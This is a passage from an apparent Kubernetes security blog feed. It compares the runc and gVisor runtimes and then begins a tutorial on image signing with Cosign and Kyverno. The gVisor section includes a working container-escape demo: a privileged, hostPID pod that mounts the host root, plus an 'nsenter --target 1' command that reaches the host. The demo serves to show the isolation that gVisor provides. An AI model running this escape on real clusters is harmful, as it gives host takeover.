<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Pod</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">nogvisor-test</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">containers:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">ubuntu</span>
      <span class="hljs-attr">image:</span> <span class="hljs-string">ubuntu:22.04</span>
      <span class="hljs-attr">command:</span> [<span class="hljs-string">"/bin/bash"</span>, <span class="hljs-string">"-c"</span>, <span class="hljs-string">"sleep 3600"</span>]
</code></pre>
<h3 id="heading-gvisor">gVisor</h3>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Pod</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">gvisor-test</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">runtimeClassName:</span> <span class="hljs-string">gvisor</span>
  <span class="hljs-attr">containers:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">ubuntu</span>
      <span class="hljs-attr">image:</span> <span class="hljs-string">ubuntu:22.04</span>
      <span class="hljs-attr">command:</span> [<span class="hljs-string">"/bin/bash"</span>, <span class="hljs-string">"-c"</span>, <span class="hljs-string">"sleep 3600"</span>]
</code></pre>
<hr />
<h2 id="heading-process-visibility-inside-the-container">Process Visibility (Inside the Container)</h2>
<h3 id="heading-commands">Commands</h3>
<p><strong>runc</strong></p>
<pre><code class="lang-bash">kubectl <span class="hljs-built_in">exec</span> -it nogvisor-test -- bash
ps aux
</code></pre>
<p><strong>gVisor</strong></p>
<pre><code class="lang-bash">kubectl <span class="hljs-built_in">exec</span> -it gvisor-test -- bash
ps aux
</code></pre>
<h3 id="heading-expected">Expected</h3>
<ul>
<li>runc: PID 1 (<code>sleep</code>), bash, ps  </li>
<li>gVisor: PID 1 (<code>sleep</code>), bash, ps  </li>
<li>TTY differs:  <ul>
<li>runc → <code>pts/0</code>  </li>
<li>gVisor → <code>?</code></li>
</ul>
</li>
</ul>
<h3 id="heading-assessment">Assessment</h3>
<p>Inside the container, gVisor looks almost identical to runc. PID namespaces behave the same. That’s the trick: <strong>gVisor changes the kernel boundary, not the container environment.</strong> From the inside, nothing looks strange.</p>
<hr />
<h2 id="heading-process-visibility-from-the-host">Process Visibility (From the Host)</h2>
<h3 id="heading-commands-1">Commands</h3>
<p><strong>Check for runc container process:</strong></p>
<pre><code class="lang-bash">ps aux | grep sleep
</code></pre>
<p><strong>Check for gVisor process wrappers:</strong></p>
<pre><code class="lang-bash">ps aux | grep runsc
</code></pre>
<h3 id="heading-expected-1">Expected</h3>
<ul>
<li>runc: host sees <code>sleep 3600</code> as a real process  </li>
<li>gVisor: host sees <code>runsc-sandbox</code>, <code>runsc-gofer</code>, etc.</li>
</ul>
<h3 id="heading-assessment-1">Assessment</h3>
<p>This is where the façade cracks. With runc, containers are <em>just host processes</em>. With gVisor, your workload runs <strong>inside a userspace kernel</strong>, not directly on the host. This is the clearest indicator that gVisor is more than “runc but safer.”</p>
<hr />
<h2 id="heading-tty-behavior">TTY Behavior</h2>
<h3 id="heading-command">Command</h3>
<pre><code class="lang-bash">ps aux
</code></pre>
<h3 id="heading-expected-2">Expected</h3>
<ul>
<li>runc: <code>TTY = pts/0</code>  </li>
<li>gVisor: <code>TTY = ?</code></li>
</ul>
<h3 id="heading-assessment-2">Assessment</h3>
<p>TTYs behave differently because gVisor doesn’t map container PTYs to real host pseudo-terminals. You’re talking to a virtualized console layer.</p>
<hr />
<h2 id="heading-proc-virtualization">/proc Virtualization</h2>
<h3 id="heading-commands-2">Commands</h3>
<pre><code class="lang-bash">cat /proc/modules | grep tcp_diag
</code></pre>
<h3 id="heading-expected-3">Expected</h3>
<ul>
<li>runc: shows real kernel modules (matching host)</li>
<li>gVisor: empty or missing</li>
</ul>
<h3 id="heading-assessment-3">Assessment</h3>
<p>Under gVisor, <code>/proc</code> is synthetic. <code>runsc</code> generates a fake procfs, so nothing from the real kernel leaks through. Kernel modules, device info, and other structural details disappear entirely. This is strong proof that syscalls never reach the kernel directly.</p>
<h2 id="heading-capabilities">Capabilities</h2>
<h3 id="heading-command-1">Command</h3>
<pre><code class="lang-bash">grep Cap /proc/self/status
</code></pre>
<h3 id="heading-expected-4">Expected</h3>
<p>runc:</p>
<pre><code>CapEff: <span class="hljs-number">00000000</span>a80425fb
</code></pre><p>gVisor:</p>
<pre><code>CapEff: <span class="hljs-number">00000000</span>a80405fb
</code></pre><h3 id="heading-assessment-4">Assessment</h3>
<p>The masks <em>look</em> nearly identical, but they don’t mean the same thing.</p>
<ul>
<li>In <strong>runc</strong>, capability bits map to real (namespaced) kernel capabilities.</li>
<li>In <strong>gVisor</strong>, the bits are <strong>synthetic values</strong> exposed by <code>runsc</code> so applications don't break.</li>
</ul>
<p>Even if CAP_SYS_ADMIN shows up in the mask, the underlying syscalls never reach the host.<br />The permissions appear real, but the power behind them isn’t.</p>
<hr />
<h2 id="heading-syscall-behavior-strace">Syscall Behavior (strace)</h2>
<blockquote>
<p>Note: you need to install <code>strace</code> inside the container.</p>
</blockquote>
<h3 id="heading-commands-3">Commands</h3>
<pre><code class="lang-bash">apt update &amp;&amp; apt install -y strace
strace ls
</code></pre>
<h3 id="heading-expected-5">Expected</h3>
<ul>
<li><strong>runc:</strong>  <pre><code>execve(<span class="hljs-string">"/usr/bin/ls"</span>, [<span class="hljs-string">"ls"</span>], ...)
</code></pre></li>
<li><strong>gVisor:</strong>  <pre><code>execve(<span class="hljs-number">0xffffffffffffffda</span>, [<span class="hljs-string">"ls"</span>], ...)
</code></pre></li>
</ul>
<h3 id="heading-assessment-5">Assessment</h3>
<p>On the host and in runc, <code>execve</code> shows a <strong>real path</strong> because the syscall goes directly into the host kernel.</p>
<p>gVisor shows a <strong>sentinel hex value</strong> instead of a path. That’s runsc intercepting the syscall before it reaches the kernel. The rest of the call trace often looks similar because gVisor emulates most of Linux’s syscall surface — but it’s emulation, not the real thing.</p>
<hr />
<h2 id="heading-filesystem-amp-mount-behavior">Filesystem &amp; Mount Behavior</h2>
<h3 id="heading-commands-4">Commands</h3>
<pre><code class="lang-bash">mount -t proc proc /mnt
touch /proc/sys/kernel/randomize_va_space
</code></pre>
<h3 id="heading-expected-6">Expected</h3>
<ul>
<li><strong>runc:</strong>  <pre><code>mount: /mnt: cannot mount proc read-only.
</code></pre></li>
<li><strong>gVisor:</strong>  <pre><code>mount: /mnt: permission denied.
</code></pre></li>
</ul>
<h3 id="heading-assessment-6">Assessment</h3>
<p>Both runtimes reject the mount, but for <strong>completely different reasons</strong>:</p>
<ul>
<li>In runc, the real kernel enforces container restrictions (read-only proc, etc.).</li>
<li>In gVisor, <strong>runsc denies the syscall immediately</strong>, before the kernel even sees it.</li>
</ul>
<p>This highlights the fundamental boundary difference:<br />runc relies on the kernel’s own namespace model, while gVisor implements mount and filesystem semantics in userspace.</p>
<hr />
<h2 id="heading-simulating-a-classic-container-escape-runc-vs-gvisor">Simulating a Classic Container Escape (runc vs gVisor)</h2>
<p>This is the last container escape demo. (Until the next one.)</p>
<h3 id="heading-runc-escape-ubuntu-node">runc Escape (Ubuntu Node)</h3>
<p>Save as <code>escape.yaml</code>:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Pod</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">escape</span>
  <span class="hljs-attr">labels:</span>
    <span class="hljs-attr">app:</span> <span class="hljs-string">escape</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">hostPID:</span> <span class="hljs-literal">true</span>
  <span class="hljs-attr">containers:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">escape</span>
      <span class="hljs-attr">image:</span> <span class="hljs-string">nicolaka/netshoot:latest</span>
      <span class="hljs-attr">command:</span> [<span class="hljs-string">"sleep"</span>, <span class="hljs-string">"3600"</span>]
      <span class="hljs-attr">securityContext:</span>
        <span class="hljs-attr">privileged:</span> <span class="hljs-literal">true</span>
      <span class="hljs-attr">volumeMounts:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">host-root</span>
          <span class="hljs-attr">mountPath:</span> <span class="hljs-string">/host</span>
  <span class="hljs-attr">volumes:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">host-root</span>
      <span class="hljs-attr">hostPath:</span>
        <span class="hljs-attr">path:</span> <span class="hljs-string">/</span>
        <span class="hljs-attr">type:</span> <span class="hljs-string">Directory</span>
  <span class="hljs-attr">restartPolicy:</span> <span class="hljs-string">Never</span>
</code></pre>
<p>Apply and exec:</p>
<pre><code class="lang-bash">kubectl apply -f escape.yaml
kubectl <span class="hljs-built_in">exec</span> -it escape -- bash
</code></pre>
<p>Escape to the host:</p>
<pre><code class="lang-bash">nsenter --target 1 --mount --uts --ipc --net --pid
</code></pre>
<p>You now land directly on the host:</p>
<pre><code class="lang-bash">uname
whoami
cat /etc/os-release
</code></pre>
<h3 id="heading-trying-the-same-escape-under-gvisor">Trying the Same Escape Under gVisor</h3>
<p>Now use the same pod spec, but with gVisor:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Pod</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">gvisor-escape</span>
  <span class="hljs-attr">labels:</span>
    <span class="hljs-attr">app:</span> <span class="hljs-string">gvisor-escape</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">hostPID:</span> <span class="hljs-literal">true</span>
  <span class="hljs-attr">runtimeClassName:</span> <span class="hljs-string">gvisor</span>
  <span class="hljs-attr">containers:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">escape</span>
      <span class="hljs-attr">image:</span> <span class="hljs-string">ubuntu:22.04</span>
      <span class="hljs-attr">command:</span> [<span class="hljs-string">"/bin/bash"</span>, <span class="hljs-string">"-c"</span>, <span class="hljs-string">"sleep 3600"</span>]
      <span class="hljs-attr">securityContext:</span>
        <span class="hljs-attr">privileged:</span> <span class="hljs-literal">true</span>
      <span class="hljs-attr">volumeMounts:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">host-root</span>
          <span class="hljs-attr">mountPath:</span> <span class="hljs-string">/host</span>
  <span class="hljs-attr">volumes:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">host-root</span>
      <span class="hljs-attr">hostPath:</span>
        <span class="hljs-attr">path:</span> <span class="hljs-string">/</span>
        <span class="hljs-attr">type:</span> <span class="hljs-string">Directory</span>
  <span class="hljs-attr">restartPolicy:</span> <span class="hljs-string">Never</span>
</code></pre>
<p>Exec in:</p>
<pre><code class="lang-bash">kubectl <span class="hljs-built_in">exec</span> -it gvisor-escape -- bash
ps aux
</code></pre>
<p>PID 1 here is just the <code>/pause</code> infrastructure container.</p>
<p>Attempt the escape:</p>
<pre><code class="lang-bash">nsenter --target 1 --mount --uts --ipc --net --pid
<span class="hljs-comment"># nsenter: failed to execute /bin/sh: No such file or directory</span>
</code></pre>
<p>This drops you into the infra container’s namespaces — <strong>not the host</strong> — and the infra container has no shell.<br />Trying to pivot to your own namespace:</p>
<pre><code class="lang-bash">nsenter --target 3 --mount --uts --ipc --net --pid -- ls /
<span class="hljs-comment"># works, but just shows your same container root</span>

nsenter --target 3 --mount --uts --ipc --net --pid
<span class="hljs-comment"># no visible change — you're already there</span>
</code></pre>
<p>Nothing interesting happens because:</p>
<ul>
<li>gVisor mediates all namespaces  </li>
<li><code>/proc</code> is virtualized  </li>
<li>escape pivots that rely on host namespaces simply don’t exist  </li>
</ul>
<p><strong>Same YAML. Very different outcome.<br />runc → host access.<br />gVisor → sandbox stays a sandbox.</strong></p>
<hr />
<h2 id="heading-wrapping-up">Wrapping Up</h2>
<p>Kubernetes makes containers feel tidy and predictable. YAML goes in, Pods come out, and somewhere in between the scheduler pretends it’s your friend. But once a container starts running, every security guarantee boils down to one question:</p>
<p><strong>Who actually handles your syscalls?</strong></p>
<ul>
<li><p>With <strong>runc</strong>, the answer is: <em>the host kernel</em>.<br />Great for performance, great for density, and great for escape demos.</p>
</li>
<li><p>With <strong>gVisor</strong>, the answer becomes: <em>a userspace kernel you don’t control from inside the container</em>.<br />Syscalls stop inside runsc, <code>/proc</code> becomes synthetic, capabilities lose their teeth, mounts break differently, and classic escape tricks like <code>nsenter --target 1</code> simply stop working because the host kernel never sees the request.</p>
</li>
</ul>
<p>That’s the gVisor mindset:  <strong>keep Kubernetes fast, but stop trusting the kernel as a security boundary.</strong></p>
<p>Is gVisor a silver bullet?  No.  But it genuinely changes the attack surface without requiring VMs or a massive architectural overhaul. That makes it worth understanding.</p>
<p>I’ll revisit this later to look at additional examples (and the very real performance hit), but that’s it for now.</p>
]]></content:encoded></item><item><title><![CDATA[Signed, Sealed, and Admitted]]></title><description><![CDATA[Kubernetes does a lot of things automatically — scheduling, networking, scaling. But trust isn’t one of them. If someone pushes an image to a registry with your project’s name on it, Kubernetes won’t ask questions. It’ll just pull and run.
Of course,...]]></description><link>https://cloudsecburrito.com/signed-sealed-and-admitted</link><guid isPermaLink="true">https://cloudsecburrito.com/signed-sealed-and-admitted</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[kyverno]]></category><category><![CDATA[cosign]]></category><category><![CDATA[Security]]></category><category><![CDATA[admission controller]]></category><dc:creator><![CDATA[Matt Brown]]></dc:creator><pubDate>Wed, 05 Nov 2025 20:46:58 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1762375301183/8d729ce7-8687-4917-8248-35601730ba75.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Kubernetes does a lot of things automatically — scheduling, networking, scaling. But trust isn’t one of them. If someone pushes an image to a registry with your project’s name on it, Kubernetes won’t ask questions. It’ll just pull and run.</p>
<p>Of course, that’s not exactly ideal. A single problematic image can skip right past scanning gates and land in production because the cluster never checked where it came from.</p>
<p>Fortunately, there’s an easy way to fix that: <strong>image signing</strong>.</p>
<p>Image signing proves who built an image and that it hasn’t changed since. <a target="_blank" href="https://github.com/sigstore/cosign">Cosign</a> (part of the Sigstore project) handles the signing and verification piece, giving your container images a verifiable identity. <strong>Kyverno</strong>, meanwhile, enforces that trust boundary inside the cluster — it can block any workload whose image isn’t signed by a trusted key.</p>
<p>In this post, we’ll:</p>
<ul>
<li>Use <strong>Cosign</strong> to sign and verify a container image manually.  </li>
<li>Create a <strong>Kyverno</strong> policy that rejects unsigned workloads.  </li>
<li>Add a tiny <strong>GitHub Action</strong> so every new build is automatically signed before deployment.  </li>
</ul>
<p>No lengthy PKI setup — just practical, auditable trust you can drop into any Kubernetes cluster today.</p>
<hr />
<h2 id="heading-why-image-signing-matters">Why Image Signing Matters</h2>
<p>Let's run through a very simple example of why you might care about this whole signing thing.</p>
<p>Say you’ve got a clean build pipeline. Your team pushes to <code>ghcr.io/company/backend:latest</code> and Kubernetes pulls it straight into production. Everyone trusts that tag.</p>
<p>Then one day you spin up a fork, test a quick change, and push it back to the same tag. Oops. The registry accepts it. The cluster redeploys automatically. Now the cluster is running this somewhat mysterious thing.</p>
<p>Nothing malicious happened. There was no exploit, no compromised credential—just an overly trusted tag and a missing signature.</p>
<p>That’s what image signing solves. Instead of trusting that “latest” means yours, you trust that it’s signed by someone you actually know. <strong>Cosign</strong> adds that proof. <strong>Kyverno</strong> enforces it before anything runs.</p>
<p>Before we dive in, you can see this in action with a public example. Chainguard maintains a registry called <strong>cgr.dev</strong>, which hosts signed, minimal container images. Every image there—like <code>cgr.dev/chainguard/nginx</code>—is verifiable using Cosign and Sigstore’s transparency log.</p>
<p>Running a basic check with OIDC (don't worry we'll get to setting this all up soon):</p>
<pre><code class="lang-bash">matt.brown@matt ~ % cosign verify \
  --certificate-identity-regexp <span class="hljs-string">"https://github.com/chainguard-images/images/.*"</span> \
  --certificate-oidc-issuer <span class="hljs-string">"https://token.actions.githubusercontent.com"</span> \
  cgr.dev/chainguard/nginx

Verification <span class="hljs-keyword">for</span> cgr.dev/chainguard/nginx:latest --
The following checks were performed on each of these signatures:
  - The cosign claims were validated
  - Existence of the claims <span class="hljs-keyword">in</span> the transparency <span class="hljs-built_in">log</span> was verified offline
  - The code-signing certificate was verified using trusted certificate authority certificates
</code></pre>
<p>You’ll see Cosign validate the signature and confirm it was signed through GitHub’s OIDC workflow. That’s what we’re building toward: verifiable image trust that proves where your workloads come from.</p>
<hr />
<h2 id="heading-setup-cosign">Setup Cosign</h2>
<p>Before we sign anything, we need to make sure <strong>Cosign</strong> is installed and working locally.</p>
<h3 id="heading-install-cosign-on-macos">Install Cosign on macOS</h3>
<p>The easiest way to get Cosign on macOS is with Homebrew. The catch? Homebrew currently ships <strong>Cosign 3.x</strong>, which switched from creating separate <code>.sig</code> files to storing signatures as <strong>OCI bundles</strong>.</p>
<p>That change is great for the future, but today it breaks verification with <strong>Kyverno</strong> (and a few other tools that still expect legacy <code>.sig</code> tags).</p>
<blockquote>
<p>Installing the newest <strong>Cosign</strong> is worse than what Alice had to experience.</p>
</blockquote>
<p>If we search Homebrew, we see only one formula:</p>
<pre><code class="lang-bash">brew search cosign
==&gt; Formulae
cosign
</code></pre>
<p>So, to stay compatible with Kyverno, we’ll install <strong>Cosign 2.6.1</strong> manually using Go.</p>
<p>First, install Go and make sure your <code>$PATH</code> includes <code>$HOME/go/bin</code> (skip if you already have Go):</p>
<pre><code class="lang-bash">brew install go
<span class="hljs-built_in">echo</span> <span class="hljs-string">'export PATH="$PATH:$HOME/go/bin"'</span> &gt;&gt; ~/.zshrc
<span class="hljs-built_in">source</span> ~/.zshrc
</code></pre>
<p>Then install Cosign 2.6.1:</p>
<pre><code class="lang-bash">go install github.com/sigstore/cosign/v2/cmd/cosign@v2.6.1
</code></pre>
<p>Once installed, confirm your version:</p>
<pre><code class="lang-bash">cosign version
</code></pre>
<p>Expected output:</p>
<pre><code class="lang-bash">  ______   ______        _______. __    _______ .__   __.
 /      | /  __  \      /       ||  |  /  _____||  \ |  |
|  ,----<span class="hljs-string">'|  |  |  |    |   (----`|  | |  |  __  |   \|  |
|  |     |  |  |  |     \   \    |  | |  | |_ | |  . `  |
|  `----.|  `--'</span>  | .----)   |   |  | |  |__| | |  |\   |
 \______| \______/  |_______/    |__|  \______| |__| \__|
cosign: A tool <span class="hljs-keyword">for</span> Container Signing, Verification and Storage <span class="hljs-keyword">in</span> an OCI registry.

GitVersion:    v2.6.1
GitCommit:     unknown
GitTreeState:  unknown
BuildDate:     unknown
GoVersion:     go1.25.3
Compiler:      gc
Platform:      darwin/arm64
</code></pre>
<hr />
<h2 id="heading-generating-signing-keys">Generating Signing Keys</h2>
<p>Now onto generating our keys.</p>
<h3 id="heading-cosign-generated">Cosign Generated</h3>
<p>The easiest way to get started is to use Cosign's built in key generation capability. Generate keys using the <code>generate-key-pair</code> command. It will require a password for your private key.</p>
<pre><code class="lang-bash">matt.brown@matt ~ % cosign generate-key-pair
Enter password <span class="hljs-keyword">for</span> private key:
Enter password <span class="hljs-keyword">for</span> private key again:
Private key written to cosign.key
Public key written to cosign.pub
</code></pre>
<p>That gives you:</p>
<pre><code class="lang-bash">matt.brown@matt ~ % ls | grep cosign
cosign.key
cosign.pub
</code></pre>
<p>You can view the public key by simply opening it. Who would have thought? But we will need this later.</p>
<pre><code class="lang-bash">matt.brown@matt ~ % cat cosign.pub
-----BEGIN PUBLIC KEY-----
...
-----END PUBLIC KEY-----
</code></pre>
<blockquote>
<p>You can also regenerate this at any time with <code>cosign public-key --key cosign.key</code> if you ever lose the .pub file.</p>
</blockquote>
<h3 id="heading-non-cosign-generated">Non Cosign Generated</h3>
<p>You can also use keys generated outside of Cosign. You import them to get them Cosign formatted. </p>
<p>Here's a quick command to generate a new elliptic-curve private key using the P-256 curve and save it as private.pem.</p>
<pre><code class="lang-bash">openssl ecparam -name prime256v1 -genkey -noout -out private.pem
`
</code></pre>
<p>Then use the Cosign import capability.</p>
<pre><code class="lang-bash">matt.brown@matt ~ % cosign import-key-pair --key private.pem
Enter password <span class="hljs-keyword">for</span> private key:
Enter password <span class="hljs-keyword">for</span> private key again:
Private key written to import-cosign.key
Public key written to import-cosign.pub
</code></pre>
<p>End result is the same, we can now sign images.</p>
<hr />
<h2 id="heading-shipping-signed-images">Shipping Signed Images</h2>
<p>So now we have our keys set. This means we're ready to hit the next step, which is to actually sign the image. You knew we'd get here at some point. We complete the process by pushing it to a repository.</p>
<p>Using Github Container Registry is my preferred way, but do it with Dockerhub or something else if you prefer.</p>
<p>Let's build our image. You can use any image of course, but feel free to use mine (https://github.com/sf-matt/hello-flask-signed). This is just a simple Flask app.</p>
<pre><code class="lang-bash">matt.brown@matt hello-flask-signed % docker buildx build --platform linux/amd64,linux/arm64  -t ghcr.io/sf-matt/hello-flask-signed:v1 --push .
[+] Building 5.2s (12/12) FINISHED                                                             docker:desktop-linux
 =&gt; [internal] load build definition from Dockerfile                                                           0.0s
 =&gt; =&gt; transferring dockerfile: 257B                                                                           0.0s
 =&gt; [internal] load metadata <span class="hljs-keyword">for</span> docker.io/library/python:3.12-slim     
...
</code></pre>
<p>Now sign it.</p>
<pre><code class="lang-bash">matt.brown@matt cosign-generated-keys % cosign sign --key cosign.key sfmatt/hello-flask-signed:v1
WARNING: Image reference sfmatt/hello-flask-signed:v1 uses a tag, not a digest, to identify the image to sign.
    This can lead you to sign a different image than the intended one. Please use a
    digest (example.com/ubuntu@sha256:abc123...) rather than tag
    (example.com/ubuntu:latest) <span class="hljs-keyword">for</span> the input to cosign. The ability to refer to
    images by tag will be removed <span class="hljs-keyword">in</span> a future release.
</code></pre>
<p>For some reason I thought signing it by tag was a smart idea. Cosign quickly shut me down, albeit they don't do the best job of explaining why. But of course the reason is fairly simple.</p>
<p>Tags like <code>:v1</code> are <strong>mutable</strong>. If the tag later points to a new image, your old signature still looks valid <strong>for the tag</strong>, even though the underlying image changed. That breaks the entire trust model. The digest uniquely identifies that exact build. Once signed, no one can change what it points to without invalidating the signature.</p>
<p>Cosign solves this by signing <strong>by digest</strong>, not tag. Seems this signing by tag will not even be an option in the future. So let's grab the digest if you didn't save it and do it that way. We’ll use <strong>Crane</strong>, a lightweight CLI from Google’s <code>go-containerregistry</code> project that makes it easy to inspect, copy, and manipulate container images right from the terminal. Install via Brew if you don't have it.</p>
<pre><code class="lang-bash">matt.brown@matt ~ % brew install crane
matt.brown@matt hello-flask-signed % crane digest ghcr.io/sf-matt/hello-flask-signed:v1
sha256:blahblah
</code></pre>
<p>Take that returned value to sign.</p>
<pre><code class="lang-bash">matt.brown@matt cosign-generated-keys % cosign sign --key cosign.key ghcr.io/sf-matt/hello-flask-signed@sha256:blahblah
Enter password <span class="hljs-keyword">for</span> private key:
WARNING: <span class="hljs-string">"ghcr.io/sf-matt/hello-flask-signed"</span> appears to be a private repository, please confirm uploading to the transparency <span class="hljs-built_in">log</span> at <span class="hljs-string">"https://rekor.sigstore.dev"</span>
Are you sure you would like to <span class="hljs-built_in">continue</span>? [y/N] N
</code></pre>
<p>Interesting, what exactly does this mean. When you sign a <strong>private image</strong>, Cosign will warn you that it’s uploading metadata to the <strong>public Rekor transparency log</strong> or <strong>tlog</strong>.</p>
<h4 id="heading-whats-actually-published">What’s actually published</h4>
<p>Cosign never uploads your image contents. From my investigation it creates just a small record containing:</p>
<ul>
<li><p>the image <strong>digest</strong> (the SHA256 hash),</p>
</li>
<li><p>your <strong>signing certificate</strong> (for keyless),</p>
</li>
<li><p>and a cryptographic proof that the entry exists in the log.</p>
</li>
</ul>
<p>This allows anyone to later verify <em>when</em> and <em>by whom</em> an image was signed. That’s great for public supply chains, but not usually necessary for <strong>internal builds</strong>.</p>
<h4 id="heading-why-we-dont-need-rekor-here-imo">Why we don’t need Rekor here (IMO)</h4>
<p>If you’re just signing and verifying images you built to run in <strong>your cluster</strong>, you already control both the registry and the verification policy. Publishing to a public transparency log adds no security benefit. It just makes your internal image digests public.</p>
<p>Then let's skip the <code>tlog</code>. We can tell Cosign not to publish to Rekor when signing private images. And we add  `--recursive`` to account for a multi arch image.</p>
<pre><code class="lang-bash">cosign sign --tlog-upload=<span class="hljs-literal">false</span> --key cosign.key --recursive   ghcr.io/sf-matt/hello-flask-signed@sha256:blahblah
</code></pre>
<p>You’ll still get a valid signature that Kyverno can verify, but no public audit entry. And that is it. We have our signed image. The next question is what exactly did that do.</p>
<hr />
<h2 id="heading-verifying-a-signature">Verifying a Signature</h2>
<p>So far, Cosign gave us no visible proof in our terminal that we are signed. To at least confirm it is signed go ahead and <strong>verify</strong> against our public key:</p>
<pre><code class="lang-bash">matt.brown@matt cosign-generated-keys % cosign verify \
  --key cosign.pub \
  --insecure-ignore-tlog=<span class="hljs-literal">true</span> \
  ghcr.io/sf-matt/hello-flask-signed@sha256:blahblah

WARNING: Skipping tlog verification is an insecure practice that lacks transparency and auditability verification <span class="hljs-keyword">for</span> the signature.

Verification <span class="hljs-keyword">for</span> ghcr.io/sf-matt/hello-flask-signed@sha256:blahblah--
The following checks were performed on each of these signatures:
  - The cosign claims were validated
  - The signatures were verified against the specified public key

[{<span class="hljs-string">"critical"</span>:{<span class="hljs-string">"identity"</span>:{<span class="hljs-string">"docker-reference"</span>:<span class="hljs-string">"ghcr.io/sf-matt/hello-flask-signed"</span>},<span class="hljs-string">"image"</span>:{<span class="hljs-string">"docker-manifest-digest"</span>:<span class="hljs-string">"sha256:blahblah"</span>},<span class="hljs-string">"type"</span>:<span class="hljs-string">"cosign container image signature"</span>},<span class="hljs-string">"optional"</span>:null}]
</code></pre>
<p>That’s the confirmation. But what do we have exactly. Well to find the signature we are looking for let's do a <code>triangulate</code>.</p>
<pre><code class="lang-bash">matt.brown@matt cosign-generated-keys % cosign triangulate ghcr.io/sf-matt/hello-flask-signed@sha256:blahblah
ghcr.io/sf-matt/hello-flask-signed:sha256-blahblah.sig
</code></pre>
<p>Ok let's see the artifact in GHCR using <code>tree</code>.</p>
<pre><code class="lang-bash">matt.brown@matt cosign-generated-keys % cosign tree ghcr.io/sf-matt/hello-flask-signed@sha256:blahblah
📦 Supply Chain Security Related artifacts <span class="hljs-keyword">for</span> an image: ghcr.io/sf-matt/hello-flask-signed@sha256:blahblah
└── 🔐 Signatures <span class="hljs-keyword">for</span> an image tag: ghcr.io/sf-matt/hello-flask-signed:sha256-blahblah.sig
   └── 🍒 sha256:different-blahblah
</code></pre>
<p>You can check the Github UI for this signature as well.</p>
<h4 id="heading-what-the-sig-image-actually-is">What the <code>.sig</code> Image Actually Is</h4>
<p>When Cosign signs an image with 2.x and before it pushes a <strong>signature artifact</strong> back into the registry. That artifact appears as a tag ending in <code>.sig</code>, as we saw with <code>ghcr.io/sf-matt/hello-flask-signed:sha256-&lt;digest&gt;.sig</code>. Behind the scenes, this is just an OCI manifest that contains a small JSON bundle with the signature, certificate (if keyless), and optional transparency-log proof. Cosign and tools like Kyverno automatically discover and verify this artifact when checking your image, so you never have to handle the <code>.sig</code> directly.</p>
<hr />
<h2 id="heading-oidc-with-sigstore">OIDC with Sigstore</h2>
<p>For public images, we can skip local keys entirely and sign using <strong>Sigstore’s keyless mode</strong>. This super easy mode authenticates you through your GitHub identity (or a couple others) via OpenID Connect (OIDC).</p>
<p>Since this example uses a <strong>public image</strong>, you can follow along with mine:<br /><code>ghcr.io/sf-matt/hello-flask-oidc:v1</code>.</p>
<p>To sign it, just run the same as before but with absolutely no keys.</p>
<pre><code class="lang-bash">cosign sign ghcr.io/sf-matt/hello-flask-oidc@sha256:04147f2536d03c40a3ac595de6c1c87f06924b775dc92442e0b3b04e5ed5793e
</code></pre>
<p>Cosign will open a browser window and ask you to log in with GitHub (or others). Once authenticated, it issues a short-lived signing certificate from <strong>Fulcio</strong> and uploads the signature to both the <strong>registry</strong> and the <strong>Rekor transparency log</strong>.</p>
<p>You’ll see a message confirming the signature and transparency log entry:</p>
<pre><code class="lang-bash">Retrieving signed certificate...
Successfully verified SCT...
tlog entry created with index: 672916270
Pushing signature to: ghcr.io/sf-matt/hello-flask-oidc
</code></pre>
<p>To verify the signature:</p>
<pre><code class="lang-bash">cosign verify   --certificate-identity <span class="hljs-string">"sdmattbrown@gmail.com"</span>   --certificate-oidc-issuer <span class="hljs-string">"https://github.com/login/oauth"</span>   ghcr.io/sf-matt/hello-flask-oidc@sha256:&lt;digest&gt;
</code></pre>
<p>Cosign will validate the certificate, confirm its entry in Rekor, and show the signed claims. No local keys, no password prompts, just OIDC-based signing tied to your GitHub identity.</p>
<p>Boom.</p>
<hr />
<h2 id="heading-validating-image-via-kyverno">Validating Image via Kyverno</h2>
<p>Ok let's move to the more interesting part, K8s. We start by setting up an [ImageValidatingPolicy (https://kyverno.io/docs/policy-types/image-validating-policy/). Here is an example for our initial signed image.</p>
<blockquote>
<p>If you need some guidance installing Kyverno it is just a simple Helm deploy, but more details can be found in an older <a target="_blank" href="https://cloudsecburrito.com/control-issues-real-policies-in-minutes-with-kyverno">post</a>.</p>
</blockquote>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">policies.kyverno.io/v1alpha1</span>
